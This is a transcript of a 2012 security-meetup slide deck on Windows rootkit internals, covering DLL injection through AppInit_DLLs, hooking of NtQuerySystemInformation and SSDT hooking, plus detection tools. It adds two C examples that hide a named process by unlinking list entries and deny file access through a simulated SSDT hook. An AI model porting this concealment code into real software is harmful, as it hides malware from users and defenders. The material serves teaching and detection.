Rootkit Internals

Rootkit Internals
By Mr. Omkar Pardeshi, Malware Analyst & Developer
[email protected]

Description: null Mumbai, April 2012 Monthly Meet (23 slides)

Transcript of Rootkit Internals

Page 1: Rootkit Internals

Rootkit Internals
By Mr. Omkar Pardeshi, Malware Analyst & Developer
[email protected]

Page 2: Rootkit Internals

Topics Overview

- Types of threats
- Tools to analyze threats
- Methodology of malware analysis
- Rootkit internals
- Fighting rootkits

Page 3: Rootkit Internals

Classification of computer viruses

Basic types:
- Worm: replicates itself
- Trojan: stand-alone program
- File infector: infects other files

Other categories: Adware, Spyware, Backdoor, Boot Sector Virus, Browser Hijacker, Macro Virus, Polymorphic Virus, Scripting Virus, Logic Bombs, Metamorphic Virus.

Page 4: Rootkit Internals

Tools to analyze computer viruses

- Sysinternals Suite: Procmon, Process Explorer, Regmon
- Regshot
- PEview
- SysTracer

Page 5: Rootkit Internals

Trail of Rootkits

- 1982: Siberian pipeline sabotage
- 2001: Magic Lantern
- 2004–2005: Greek wiretapping case
- 2005: Sony BMG copy protection rootkit scandal (digital rights management software called Extended Copy Protection, exposed by Mark Russinovich)
- Rootkit.Duqu.A

Page 6: Rootkit Internals

Rootkit

A rootkit is just a technology for subverting the standard operating system. The design goals of a rootkit are to provide three services:
1. Remote access
2. Monitoring
3. Concealment

Page 7: Rootkit Internals

Types

- Real mode: the MS-DOS kernel runs with no privilege separation (real mode has no protection rings); code hooks the system through Interrupt Service Routines (ISRs) and the Interrupt Vector Table (IVT).
- Protected mode: the operating system kernel loads in protected mode and runs in ring 0 (kernel mode); applications run in the unprivileged ring 3 (user mode).

Page 8: Rootkit Internals

Types of rootkits

- User mode
- Kernel mode

Page 9: Rootkit Internals

User Mode Rootkit Demo

Page 10: Rootkit Internals

What happens exactly? (OS level)

Page 11: Rootkit Internals

Process Level (diagram)

Before injection: Taskmgr -> NTDLL -> ntoskrnl.exe

After injection:  Taskmgr -> AppInitHook (injected DLL) -> NTDLL -> ntoskrnl.exe

Call to NtQueryInfo (NtQuerySystemInformation) -> result returned to the hook -> hook delivers the modified result to Taskmgr

Page 12: Rootkit Internals

Memory Level (diagram)

AppInitHook (injected DLL)
  0x2000: hook routine for NtQuerySystemInformation
  0x2100: return point after the call to ntdll

NTDLL
  0x6000 ... 0x6500: NtQuerySystemInformation (original)

Flow: the call to NtQuerySystemInformation lands in AppInitHook at 0x2000, which makes the "Call to ntdll" to the original at 0x6500; the original returns ("Ret 0x2100") into the hook, which modifies the result before handing it back to the caller.

Page 13: Rootkit Internals

DLL Injection

- AppInit_DLLs: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows (the DLLs listed there are loaded into every process that loads user32.dll; on Windows 8 and later the mechanism is disabled by default when Secure Boot is enabled)
- Other ways: SetWindowsHookEx, WriteProcessMemory + CreateRemoteThread, changing the import table

Page 14: Rootkit Internals

Lots of ways to inject your code

Code injection (inject a DLL):
- Create a remote thread
- Write process memory (WriteProcessMemory)
- Hooking

Page 15: Rootkit Internals

User Mode Rootkit Demo Details

Flow: AppInit_DLLs -> DllMain -> hook NtQuerySystemInformation -> HookedNtQuerySystemInformation

Prototype of the hooked function:

    NTSTATUS NtQuerySystemInformation(
        __in      SYSTEM_INFORMATION_CLASS SystemInformationClass,
        __inout   PVOID                    SystemInformation,
        __in      ULONG                    SystemInformationLength,
        __out_opt PULONG                   ReturnLength);

Page 16: Rootkit Internals

Sketch of the hook (the slide's fragments, with the steps filled in as comments):

    NTSTATUS HookedNtQuerySystemInformation(__in SYSTEM_INFORMATION_CLASS SystemInformationClass, __inout PVOID SystemInformation, __in ULONG SystemInformationLength, __out_opt PULONG ReturnLength)
    {
        // Call the original NtQuerySystemInformation through the pointer saved when the hook was installed
        NTSTATUS status = OriginalNtQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
        // Walk the returned process list (entries are chained by NextEntryOffset) and look for the process to hide.
        // Note: UNICODE_STRING.Length is in bytes, so the character count for wcsncmp is Length / sizeof(WCHAR).
        PMY_SYSTEM_PROCESS_INFORMATION pNext = (PMY_SYSTEM_PROCESS_INFORMATION)SystemInformation;
        if (!wcsncmp(pNext->ImageName.Buffer, L"calc.exe", pNext->ImageName.Length / sizeof(WCHAR)))
            /* unlink this entry by adjusting the previous entry's NextEntryOffset */ ;
        // Return the (modified) result
        return status;
    }
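The part the slide leaves out is the unlinking itself: how a hooked NtQuerySystemInformation removes the matching entry from the SystemProcessInformation buffer so that Task Manager never sees it. The following is an added example, not the presenter's code. It reproduces only the fields the walk needs (NextEntryOffset, ImageName, UniqueProcessId), uses wchar_t in place of the 16-bit WCHAR so it compiles on any C compiler, and runs on a constructed process list with made-up PIDs; the real SYSTEM_PROCESS_INFORMATION is larger, but the logic depends solely on NextEntryOffset, so it carries over unchanged. It also handles the two edge cases a naive hook gets wrong: a hidden entry at the end of the list, and two hidden entries in a row.

```c
/* Added example (not the slide deck's code): unlinking a process from a
 * SystemProcessInformation buffer inside a hooked NtQuerySystemInformation.
 * Assumptions: Windows-sized ULONG/USHORT, wchar_t standing in for WCHAR,
 * and a struct that keeps only the fields the walk touches. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <wchar.h>

typedef uint32_t ULONG;
typedef uint16_t USHORT;

typedef struct {
    USHORT   Length;         /* length in BYTES, not characters */
    USHORT   MaximumLength;
    wchar_t *Buffer;
} UNICODE_STRING_LIKE;

/* Subset of SYSTEM_PROCESS_INFORMATION; hiding only ever rewrites NextEntryOffset. */
typedef struct {
    ULONG               NextEntryOffset; /* bytes from this entry to the next; 0 = last */
    ULONG               NumberOfThreads;
    UNICODE_STRING_LIKE ImageName;       /* empty for the Idle process (PID 0) */
    ULONG               UniqueProcessId;
} PROC_INFO_LIKE;

#define ENTRY_COUNT 5
static PROC_INFO_LIKE g_list[ENTRY_COUNT];   /* stands in for the caller-supplied SystemInformation buffer */

static void set_name(PROC_INFO_LIKE *e, const wchar_t *name)
{
    e->ImageName.Buffer        = (wchar_t *)name;
    e->ImageName.Length        = (USHORT)(wcslen(name) * sizeof(wchar_t));
    e->ImageName.MaximumLength = (USHORT)(e->ImageName.Length + sizeof(wchar_t));
}

/* Constructed sample (names and PIDs made up), laid out as the kernel returns
 * it: entries back to back, each pointing at the next via NextEntryOffset. */
PROC_INFO_LIKE *build_sample_list(void)
{
    static const wchar_t *names[ENTRY_COUNT] = { L"", L"System", L"calc.exe", L"explorer.exe", L"calc.exe" };
    static const ULONG    pids[ENTRY_COUNT]  = { 0, 4, 1234, 5678, 4321 };
    for (int i = 0; i < ENTRY_COUNT; i++) {
        set_name(&g_list[i], names[i]);
        g_list[i].UniqueProcessId = pids[i];
        g_list[i].NumberOfThreads = 1;
        g_list[i].NextEntryOffset = (i + 1 < ENTRY_COUNT) ? (ULONG)sizeof(PROC_INFO_LIKE) : 0;
    }
    return g_list;
}

PROC_INFO_LIKE *sample_head(void) { return g_list; }

static PROC_INFO_LIKE *next_entry(PROC_INFO_LIKE *e)
{
    return e->NextEntryOffset ? (PROC_INFO_LIKE *)((char *)e + e->NextEntryOffset) : NULL;
}

static int name_matches(const UNICODE_STRING_LIKE *s, const wchar_t *target)
{
    size_t nchars = s->Length / sizeof(wchar_t);   /* Length is in bytes */
    return s->Buffer != NULL && nchars == wcslen(target) && wcsncmp(s->Buffer, target, nchars) == 0;
}

/* Unlink every entry whose image name equals target; returns how many were hidden.
 * The head entry is never unlinked: the hook cannot move the caller's buffer,
 * and on Windows the head is always the Idle process (PID 0) anyway. */
size_t hide_process(PROC_INFO_LIKE *head, const wchar_t *target)
{
    PROC_INFO_LIKE *prev = NULL, *cur = head;
    size_t hidden = 0;
    for (;;) {
        PROC_INFO_LIKE *next = next_entry(cur);
        if (prev != NULL && name_matches(&cur->ImageName, target)) {
            /* Make prev jump over cur. If cur was last, prev becomes the terminator.
             * prev is left unchanged so that consecutive matches also get skipped. */
            prev->NextEntryOffset = next ? prev->NextEntryOffset + cur->NextEntryOffset : 0;
            hidden++;
        } else {
            prev = cur;
        }
        if (next == NULL) break;
        cur = next;
    }
    return hidden;
}

/* What a consumer such as Task Manager sees: walk the (possibly modified) list. */
size_t count_entries(PROC_INFO_LIKE *head)
{
    size_t n = 0;
    for (PROC_INFO_LIKE *e = head; e != NULL; e = next_entry(e)) n++;
    return n;
}

ULONG pid_at(PROC_INFO_LIKE *head, size_t idx)
{
    for (PROC_INFO_LIKE *e = head; e != NULL; e = next_entry(e), idx--)
        if (idx == 0) return e->UniqueProcessId;
    return (ULONG)-1;   /* out of range */
}

int main(void)
{
    PROC_INFO_LIKE *list = build_sample_list();
    printf("entries before: %zu\n", count_entries(list));
    printf("hidden: %zu\n", hide_process(list, L"calc.exe"));
    printf("entries after: %zu\n", count_entries(list));
    for (size_t i = 0; i < count_entries(list); i++)
        printf("  pid %u\n", (unsigned)pid_at(list, i));
    return 0;
}
```

Because the hook only edits offsets, the buffer length reported in ReturnLength stays the same; consumers that walk the chain see one entry fewer, while a scanner that compares the chain against a raw scan of the buffer (or against another enumeration source such as the handle table) can spot the gap.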

Page 17: Rootkit Internals

Kernel Mode Rootkit Demo

Page 18: Rootkit Internals

What happens exactly?

Page 19: Rootkit Internals

In the kernel

Page 20: Rootkit Internals

Algorithm for kernel function (SSDT) hooking

1. Get the address of the SSDT.
2. Get the offset (service index) of the target function in the SSDT.
3. Save the original address.
4. Write the address of our function into the SSDT.
5. If the query call is for our file, deny access.
6. If not, call the original function from the saved address.
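The six steps above, run against a simulated service table so they can be executed outside a driver, as an added example that is not the presenter's code. Assumptions: the table holds raw function pointers (the 32-bit SSDT layout; x64 stores relative offsets), the service routine takes the path directly instead of an OBJECT_ATTRIBUTES, the protected path "C:\rootkit\hidden.sys" is made up, and the kernel-only details (making the table writable by clearing CR0.WP or remapping it through an MDL, PatchGuard on x64) are left out. It also includes the check a GMER-style scanner performs: comparing every table entry against the expected address.

```c
/* Added example (not the slide deck's code): SSDT hook install / dispatch /
 * remove on a simulated service table, plus pristine-table comparison as a
 * detector. See the lead-in for the assumptions. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

typedef int32_t NTSTATUS;
#define STATUS_SUCCESS                ((NTSTATUS)0x00000000L)
#define STATUS_INVALID_SYSTEM_SERVICE ((NTSTATUS)0xC000001CL)
#define STATUS_ACCESS_DENIED          ((NTSTATUS)0xC0000022L)

typedef NTSTATUS (*SERVICE_FN)(const char *path);

enum { SVC_NtCreateFile = 0, SVC_NtOpenFile = 1, SVC_NtQueryDirectoryFile = 2, SERVICE_COUNT = 3 };

/* Simulated KeServiceDescriptorTable.ServiceTableBase, and the pristine copy a
 * scanner would reconstruct from ntoskrnl's on-disk exports. */
static SERVICE_FN g_ssdt[SERVICE_COUNT];
static SERVICE_FN g_ssdt_pristine[SERVICE_COUNT];

/* Stand-ins for the real system services: everything succeeds. */
static NTSTATUS fake_NtCreateFile(const char *path)         { (void)path; return STATUS_SUCCESS; }
static NTSTATUS fake_NtOpenFile(const char *path)           { (void)path; return STATUS_SUCCESS; }
static NTSTATUS fake_NtQueryDirectoryFile(const char *path) { (void)path; return STATUS_SUCCESS; }

static SERVICE_FN  g_saved_original = NULL;                   /* step 3: the saved address */
static const char *g_protected      = "C:\\rootkit\\hidden.sys"; /* constructed "our file" */

void init_ssdt(void)
{
    g_ssdt[SVC_NtCreateFile]         = fake_NtCreateFile;
    g_ssdt[SVC_NtOpenFile]           = fake_NtOpenFile;
    g_ssdt[SVC_NtQueryDirectoryFile] = fake_NtQueryDirectoryFile;
    memcpy(g_ssdt_pristine, g_ssdt, sizeof g_ssdt);
    g_saved_original = NULL;
}

/* The rootkit's replacement routine: steps 5 and 6. */
static NTSTATUS hooked_NtOpenFile(const char *path)
{
    if (path != NULL && strcmp(path, g_protected) == 0)
        return STATUS_ACCESS_DENIED;      /* the call is for our file: deny */
    return g_saved_original(path);        /* otherwise call the original from the saved address */
}

/* Steps 1-4: index the table, save the original entry, write ours in its place.
 * Returns 1 on success, 0 for a bad index or an already-installed hook. */
int install_hook(unsigned index)
{
    if (index >= SERVICE_COUNT || g_saved_original != NULL) return 0;
    g_saved_original = g_ssdt[index];
    g_ssdt[index]    = hooked_NtOpenFile;
    return 1;
}

/* Restore the saved entry (the cleanup a well-behaved driver does on unload). */
int remove_hook(unsigned index)
{
    if (index >= SERVICE_COUNT || g_saved_original == NULL || g_ssdt[index] != hooked_NtOpenFile) return 0;
    g_ssdt[index]    = g_saved_original;
    g_saved_original = NULL;
    return 1;
}

/* What the system-call dispatcher does: look the index up and call through the table. */
NTSTATUS syscall_dispatch(unsigned index, const char *path)
{
    return index < SERVICE_COUNT ? g_ssdt[index](path) : STATUS_INVALID_SYSTEM_SERVICE;
}

/* Detection: any entry that no longer matches the expected address is reported as hooked. */
int count_hooked_entries(void)
{
    int n = 0;
    for (int i = 0; i < SERVICE_COUNT; i++)
        if (g_ssdt[i] != g_ssdt_pristine[i]) n++;
    return n;
}

int main(void)
{
    init_ssdt();
    install_hook(SVC_NtOpenFile);
    printf("open %s -> 0x%08x\n", g_protected, (unsigned)syscall_dispatch(SVC_NtOpenFile, g_protected));
    printf("hooked SSDT entries: %d\n", count_hooked_entries());
    remove_hook(SVC_NtOpenFile);
    printf("hooked SSDT entries after unhook: %d\n", count_hooked_entries());
    return 0;
}
```

Note that the hook only covers the one service it replaced: the same file is still reachable through NtCreateFile and visible through NtQueryDirectoryFile, which is why real rootkits hook several entries and why scanners flag every entry whose address falls outside the ntoskrnl image.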

Page 21: Rootkit Internals

Welcome to Kernel Mode

Ways for a rootkit to get into the system:
- SSDT hook
- Shadow SSDT hook (win32k.sys)
- File system callback
- Registry callback
- Interrupt Descriptor Table (IDT) hook
- Registered notify routines
- Windows hook
- Driver hook
- Dispatch hook
- Keyboard hook
- System thread
- ... the list goes on

Page 22: Rootkit Internals

Detection Tools

GMER, RootKit Unhooker, Sysrevaler and various other rootkit scanners. To stay secure, use an updated AV and install all security patches.

Page 23: Rootkit Internals

Questions?

Thank you